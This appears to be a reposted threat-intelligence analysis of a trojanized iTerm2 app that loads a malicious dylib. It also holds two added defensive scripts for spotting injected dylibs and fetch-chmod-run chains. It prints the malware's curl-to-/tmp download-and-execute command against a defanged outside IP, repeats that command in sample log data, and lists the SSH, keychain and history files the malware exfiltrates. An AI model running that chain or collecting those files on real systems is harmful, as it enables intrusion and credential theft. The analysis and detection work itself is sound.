Download ITerm For Mac 3.4.10

Posted : admin On 1/26/2022


We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim’s machine.


Earlier this month, a user on the Chinese question-and-answer website Zhihu reported that a search engine result for the keyword “iTerm2” led to a fake website that mimics the legitimate iTerm2 site (Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link on this fake website. When the app is executed, it downloads and runs a malicious Python script from 47[.]75[.]123[.]111. This malware, which Trend Micro detects as TrojanSpy.Python.ZURU.A, collects private data from the victim’s machine.

Objective-See previously published a blog entry about this malware that analyzed how the threat actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib. This library, in turn, downloads and runs other components, including the aforementioned script and a Mach-O file called “GoogleUpdate” that contains a Cobalt Strike beacon payload. This blog entry covers the malware’s details.

The trojanized app

As of September 15, the fake website is still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link, hxxp://, from which users download a macOS disk image (DMG) called iTerm.dmg. The user is sent to this same download URL for iTerm.dmg regardless of which app version is selected on the fake website, whereas the real website has different URLs and files for each version. The files downloaded from the legitimate website come as ZIP archives, not as a DMG like the fraudulent website’s file, as shown in Figure 2.

Comparing the folder structure of the DMG and ZIP files shows numerous differences between them:

  • All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas the files in the legitimate app are signed with a Developer ID Application certificate. According to Apple documentation, an Apple Distribution certificate is used only to sign an app before the developer submits it to the App Store, so apps downloaded from the App Store generally do not carry an Apple Distribution certificate, and an app offered for direct download should carry a Developer ID signature instead. An Apple Distribution signature on a bundle that was never in the App Store is therefore a red flag in itself; the signer of an installed app can be checked with macOS’s codesign tool.
  • The trojanized iTerm2 app contains a file called libcrypto.2.dylib (SHA-256 hash 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.
  • In the trojanized iTerm2 app, the main Mach-O file has an additional load command, LC_LOAD_DYLIB, that loads the libcrypto.2.dylib file, as shown in Figure 5.

According to Objective-See’s blog post, the malicious code in libcrypto.2.dylib is executed automatically when the victim runs the trojanized iTerm2 app, because the dynamic linker maps every library named in an LC_LOAD_DYLIB command before the app’s own code starts. This is a clever method for repacking legitimate apps that we had not seen before.
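The load-command diff described above is easy to automate. The following Python script is an added example (it is not code from the Trend Micro report or from the iTerm2 project): it walks the load commands of a Mach-O file, handling fat/universal binaries as well as thin ones, collects every dylib the binary will map at load time, and diffs that list against a known-good baseline. The binaries it parses in the demo are minimal Mach-O files constructed in memory, not real iTerm2 builds; BASELINE is an assumed dependency list for illustration, and the injected path is a constructed example of what an inserted LC_LOAD_DYLIB might carry.

```python
"""Enumerate the dylibs a Mach-O binary loads and diff them against a known-good
baseline, the check that would have exposed the extra LC_LOAD_DYLIB in the
trojanized iTerm2.  Added example, not Trend Micro's or the iTerm2 project's
code.  The binaries built below are minimal constructed Mach-O files, not real
iTerm2 builds, and BASELINE is an assumed dependency list for illustration."""
import struct
import sys

MH_MAGIC_64, MH_MAGIC, FAT_MAGIC = 0xFEEDFACF, 0xFEEDFACE, 0xCAFEBABE
LC_LOAD_DYLIB = 0x0C
# Variants that also map a library at load time (high bit = LC_REQ_DYLD):
# LC_LOAD_WEAK_DYLIB, LC_REEXPORT_DYLIB, LC_LOAD_UPWARD_DYLIB.
DYLIB_LOAD_CMDS = {LC_LOAD_DYLIB, 0x80000018, 0x8000001F, 0x80000023}
CPU_TYPE_X86_64, MH_EXECUTE = 0x01000007, 2

BASELINE = [  # assumed known-good list, not iTerm2's real dependency set
    "/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa",
    "/usr/lib/libSystem.B.dylib",
    "/usr/lib/libobjc.A.dylib",
]
INJECTED = "@executable_path/../Frameworks/libcrypto.2.dylib"  # constructed path


def _slices(data):
    """Yield (offset, size) of each architecture slice; fat/universal files have several."""
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]
        for i in range(nfat):            # struct fat_arch is big-endian, 20 bytes
            _, _, off, size, _ = struct.unpack(">iiIII", data[8 + 20 * i:28 + 20 * i])
            yield off, size
    else:
        yield 0, len(data)


def load_dylibs(data):
    """Install paths of every dylib the binary's load commands pull in (sorted, unique)."""
    paths = set()
    for off, size in _slices(data):
        blob = data[off:off + size]
        magic = struct.unpack("<I", blob[:4])[0]
        if magic not in (MH_MAGIC_64, MH_MAGIC):
            raise ValueError("unsupported Mach-O slice magic 0x%08x" % magic)
        pos = 32 if magic == MH_MAGIC_64 else 28   # mach_header_64 has a trailing reserved field
        ncmds = struct.unpack("<I", blob[16:20])[0]
        for _ in range(ncmds):
            cmd, cmdsize = struct.unpack("<II", blob[pos:pos + 8])
            if cmdsize < 8 or pos + cmdsize > len(blob):
                raise ValueError("corrupt load command at offset %d" % pos)
            if cmd in DYLIB_LOAD_CMDS:
                # struct dylib_command: cmd, cmdsize, name.offset, timestamp, versions...
                name_off = struct.unpack("<I", blob[pos + 8:pos + 12])[0]
                raw = blob[pos + name_off:pos + cmdsize]
                paths.add(raw.split(b"\0", 1)[0].decode("utf-8", "replace"))
            pos += cmdsize
    return sorted(paths)


def unexpected_dylibs(data, baseline):
    """Dylibs loaded by `data` that the known-good build does not load."""
    return sorted(set(load_dylibs(data)) - set(baseline))


def build_sample_macho(dylibs):
    """Construct a minimal x86_64 Mach-O header whose only load commands are LC_LOAD_DYLIBs."""
    cmds = b""
    for path in dylibs:
        name = path.encode() + b"\0"
        name += b"\0" * (-len(name) % 8)             # load commands are 8-byte aligned
        cmds += struct.pack("<IIIIII", LC_LOAD_DYLIB, 24 + len(name), 24, 2, 0x10000, 0x10000) + name
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, CPU_TYPE_X86_64, 3, MH_EXECUTE,
                         len(dylibs), len(cmds), 0, 0)
    return header + cmds


def build_fat(slices):
    """Wrap thin slices in a fat header, as a universal app binary would be."""
    archs, body, off = b"", b"", 8 + 20 * len(slices)
    for s in slices:
        archs += struct.pack(">iiIII", CPU_TYPE_X86_64, 3, off, len(s), 0)
        body += s
        off += len(s)
    return struct.pack(">II", FAT_MAGIC, len(slices)) + archs + body


if __name__ == "__main__":
    if len(sys.argv) > 1:       # real use: point it at App.app/Contents/MacOS/<main binary>
        print("\n".join(load_dylibs(open(sys.argv[1], "rb").read())))
    else:                       # demo on the constructed samples
        trojanized = build_fat([build_sample_macho(BASELINE),
                                build_sample_macho(BASELINE + [INJECTED])])
        print("unexpected:", unexpected_dylibs(trojanized, BASELINE))
```

On a Mac the same list comes from `otool -L` and the signer from `codesign -dvv`; the point of the script is that the comparison against a known-good build can run off-box, over a quarantined DMG, on any OS. Note what it does not catch: a repack that replaces an existing dylib with a same-named malicious one leaves the load commands unchanged, so hash the Frameworks directory against the legitimate release as well.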

Once executed, the malware connects to its server and receives the following shell command from it:

  'curl -sfo /tmp/ http://47[.]75[.]123[.]111/ && chmod 777 /tmp/ && python /tmp/ && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate'

The command does the following:

  1. Downloads the Python script to the /tmp/ folder, marks it world-writable and executable (chmod 777) and runs it with the system Python
  2. Downloads “GoogleUpdate” to /tmp/GoogleUpdate, marks it executable in the same way and runs it
  3. The script, once running, collects data from the machine
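The chain above (fetch to /tmp, chmod, execute, repeated for each stage) is a pattern worth alerting on in process-execution telemetry. The following Python script is an added example, not code from the Trend Micro report or from the malware: it splits a command line on shell chain operators, tracks which paths curl or wget wrote to, and flags the line when a fetched file is then chmod’ed or executed. It goes beyond the page’s single command by also handling wget, `;` separators and execution through an interpreter. SAMPLE_LOG is constructed telemetry in an assumed “timestamp user command-line” layout, and /tmp/loader.py is a placeholder, not the real script’s filename.

```python
"""Flag "fetch to a scratch directory, chmod, execute" command chains such as the
one the ZURU loader receives from its server.  Added example, not Trend Micro's
or the malware's code.  SAMPLE_LOG is constructed process-execution telemetry in
an assumed "timestamp user command-line" layout; /tmp/loader.py is a placeholder
name, not the real script's filename."""
import re
import shlex

REFANG = str.maketrans({"[": "", "]": ""})        # 47[.]75[.]123[.]111 -> 47.75.123.111
SEP = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")        # shell chain operators
IP_URL = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)")
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "perl", "ruby", "osascript"}

SAMPLE_LOG = [  # constructed records, not real telemetry
    "2021-09-15T10:02:11Z alice curl -sfo /tmp/loader.py http://47[.]75[.]123[.]111/loader.py"
    " && chmod 777 /tmp/loader.py && python /tmp/loader.py"
    " && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate"
    " && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate",
    "2021-09-15T10:05:40Z alice curl -sfo /tmp/latest.json https://example.com/latest.json",
    "2021-09-15T10:07:02Z bob brew install --cask iterm2",
    "2021-09-15T10:09:13Z bob wget -O /tmp/setup.sh http://203.0.113.10/setup.sh; sh /tmp/setup.sh",
]


def download_target(argv):
    """If argv is a curl/wget fetch, return (url, output_path or None); else None."""
    tool = argv[0].rsplit("/", 1)[-1]
    if tool not in ("curl", "wget"):
        return None
    out_flags = {"-o", "--output"} if tool == "curl" else {"-O", "--output-document"}
    url = out = None
    i = 1
    while i < len(argv):
        a = argv[i]
        if a in out_flags or (tool == "curl" and re.fullmatch(r"-[a-zA-Z]*o", a)):
            out = argv[i + 1] if i + 1 < len(argv) else None   # -o PATH, or clustered -sfo PATH
            i += 2
            continue
        if a.startswith("--output-document="):
            out = a.split("=", 1)[1]
        elif a.startswith(("http://", "https://")):
            url = a
        i += 1
    return (url, out) if url else None


def analyze(cmdline):
    """Return (kind, detail) findings for one shell command line."""
    findings, fetched = [], {}                      # fetched: output path -> source URL
    for part in SEP.split(cmdline):
        try:
            argv = shlex.split(part)
        except ValueError:                          # unbalanced quotes: fall back to whitespace split
            argv = part.split()
        if not argv:
            continue
        dl = download_target(argv)
        if dl:
            url, out = dl
            if IP_URL.match(url):
                findings.append(("download_ip", url))
            if out:
                fetched[out] = url
                if out.startswith(SCRATCH_DIRS):
                    findings.append(("download_tmp", out))
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "chmod" and argv[-1] in fetched:
            findings.append(("chmod", " ".join(argv[1:])))
        elif prog in INTERPRETERS and any(t in fetched for t in argv[1:]):
            findings.append(("exec", " ".join(argv)))
        elif argv[0] in fetched:                    # fetched file run directly
            findings.append(("exec", " ".join(argv)))
    return findings


def is_hit(findings):
    """A hit needs a risky fetch plus a chmod or execution of the fetched file."""
    kinds = {k for k, _ in findings}
    return bool(kinds & {"download_ip", "download_tmp"}) and bool(kinds & {"chmod", "exec"})


def scan_log(lines):
    """Scan 'timestamp user command-line' records; [.] is refanged so report IOCs can be pasted in."""
    hits = []
    for line in lines:
        ts, user, cmdline = line.split(" ", 2)
        findings = analyze(cmdline.translate(REFANG))
        if is_hit(findings):
            hits.append({"ts": ts, "user": user, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["user"])
        for kind, detail in hit["findings"]:
            print("   ", kind, detail)
```

Two caveats for real deployment: a `curl … | sh` pipeline never writes a path, so it is not matched by this rule and needs the pipe operator tracked separately; and the benign second record (a fetch into /tmp with no follow-on) shows why the rule requires the chmod or execution step rather than alerting on every download to a scratch directory.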

The Python script collects the following system data and files from the victim’s machine and sends them to the server:

  1. Operating system information
  2. Username
  3. Installed applications
  4. Local IP address
  5. Copies of these files and folders:
    1. ~/.bash_history
    2. ~/.zsh_history
    3. ~/.gitConfig
    4. /etc/hosts
    5. ~/.ssh
    6. ~/.zhHistory
    7. ~/Library/Keychains/Login.keychain-db
    8. ~/Library/Application Support/VanDyke/SecureCRT/Config/
    9. ~/Library/Application Support/iTerm2/SavedState/
  6. The contents of these directories:
    1. ~/ (the current user’s home directory)
    2. ~/Desktop
    3. ~/Documents
    4. ~/Downloads
    5. /Applications

Other trojanized apps and fake sites

Further analysis of the trojanized iTerm2 app’s Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.

Table 1. Other trojanized apps found on VirusTotal
File Name: Microsoft Remote Desktop.dmg
SHA-256 Hash: 5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259
Detection: TrojanSpy.MacOS.ZURU.A

Searching VirusTotal for the Secure Sockets Layer (SSL) certificate thumbprint that the fake website used revealed several other fraudulent websites. As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.

We were able to access one of these fake websites, but the download link on its page was empty at that time, so it remains uncertain whether the website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for macOS, in the wild (Figure 7). All of these domains were inaccessible at the time of writing.

Download server

The server used for hosting the trojanized packages, kaidingle[.]com, was registered on September 7 and is still active. According to VirusTotal, apart from iTerm.dmg, it also hosts other DMG files such as SecureCTR.dmg and Navicat15_cn.dmg (Figure 8). As of September 18, the latter two DMG files can still be downloaded from the server.


Based on the domain’s WHOIS record, there are four other domains under the same registrant (Figure 9). However, so far, none of these domains show any indication that they are related to malware.

Second-stage server

VirusTotal recorded multiple URLs related to a second-stage server at the IP address 47[.]75[.]123[.]111, the same address that hosts the malicious script, between September 8 and 17, as shown in Figure 10.

Besides the script and “GoogleUpdate” components that are part of the trojanized iTerm app’s routine, the second-stage server also hosts four other Mach-O files that are used as post-exploitation tools (Table 2).

Table 2. Other Mach-O files hosted on the second-stage server
File Name: la
SHA-256 Hash: 79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5
Description/Detection: An open-source intranet penetration scanner framework

File Name:
SHA-256 Hash:
Description/Detection: A tool for port forwarding and intranet proxying

File Name:
SHA-256 Hash:
Description/Detection: Netscan scans a network for open ports on an IP or IP range and for IP addresses in use on that network



Notably, the IP address of the second-stage server is close to the one that “GoogleUpdate” connects to, 47[.]75[.]96[.]198. Both addresses are hosted by Alibaba Hong Kong. As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were first recorded around the same time as those of the second-stage server, which suggests that the two servers may have been set up by the same threat actor.

Advertisement sites

As detailed in the aforementioned user report, the first item in the search engine results is under a subdomain of a third party’s domain. Searching for this address in Google returns two results that lead only to cached copies (Figure 12), and as of this writing, the actual pages are already down.

The first search result, titled “Microsoft Remote Desktop,” has the address hxxp://, but based on its cached copy (Figure 13) and source code (Figure 14), we found that it redirected visitors to a fake website, hxxp://


Checking its main page, we discovered that the second-level domain belongs to an agriculture company in northern China. Apart from the subdomain used here, this second-level domain has 44 other subdomains, almost all of which serve advertisements unrelated to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising but cannot prevent their misuse. If so, the threat actor rented the subdomain to distribute malware.

Security recommendations


To protect systems from threats like these, end users should download apps only from official and legitimate sources, treat search engine results with care, and always double-check URLs to make sure they point to the official site. Checking the signer of an app’s code signature before running it would also have exposed this package, since the legitimate iTerm2 is signed with a Developer ID certificate and the trojanized copy is not. Mac users can also consider multilayered security solutions such as Trend Micro Antivirus for Mac®, which flags and blocks scam websites that attempt to steal personal data; it is available on its own or as part of Trend Micro Maximum Security, a multi-platform solution that provides multidevice protection against cyberthreats.

Indicators of Compromise (IOCs)

File Name: libcrypto.2.dylib
SHA-256 Hash: 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef
Detection:

File Name: Microsoft Remote Desktop.dmg
SHA-256 Hash: 5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259
Detection: TrojanSpy.MacOS.ZURU.A

File Name: la
SHA-256 Hash: 79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5
Detection:

Network indicators:
  • 47[.]75[.]123[.]111 (second-stage server; hosts the Python script and “GoogleUpdate”, exfiltration endpoint hxxp://47[.]75[.]123[.]111/u.php)
  • 47[.]75[.]96[.]198 (address that “GoogleUpdate” connects to)
  • 43[.]129[.]218[.]115 (fraudulent websites)
  • kaidingle[.]com (download server for the trojanized packages)

MITRE Tactics, Techniques, and Procedures (TTPs)

Initial Access
  • Spearphishing Link: phishing website reached from search engine results

Execution
  • Downloads and runs the Python script
  • Malicious File: executing the repackaged iTerm2 app launches the malicious dylib libcrypto.2.dylib

Defense Evasion
  • Deobfuscate/Decode Files or Information: strings in the malicious dylib are AES and Base64 encoded
  • Masquerading: the malware is a malicious dylib inserted into a repackaged iTerm2 app

Collection
  • Archive via Library: collects various information and adds it to a ZIP archive
  • Data from Local System: collects system information, shell history and the login keychain
  • Data from Configuration Repository: collects the contents of ~/Library/Application Support/VanDyke/SecureCRT/Config

Exfiltration
  • Exfiltration Over C2 Channel: files are exfiltrated to hxxp://47[.]75[.]123[.]111/u.php
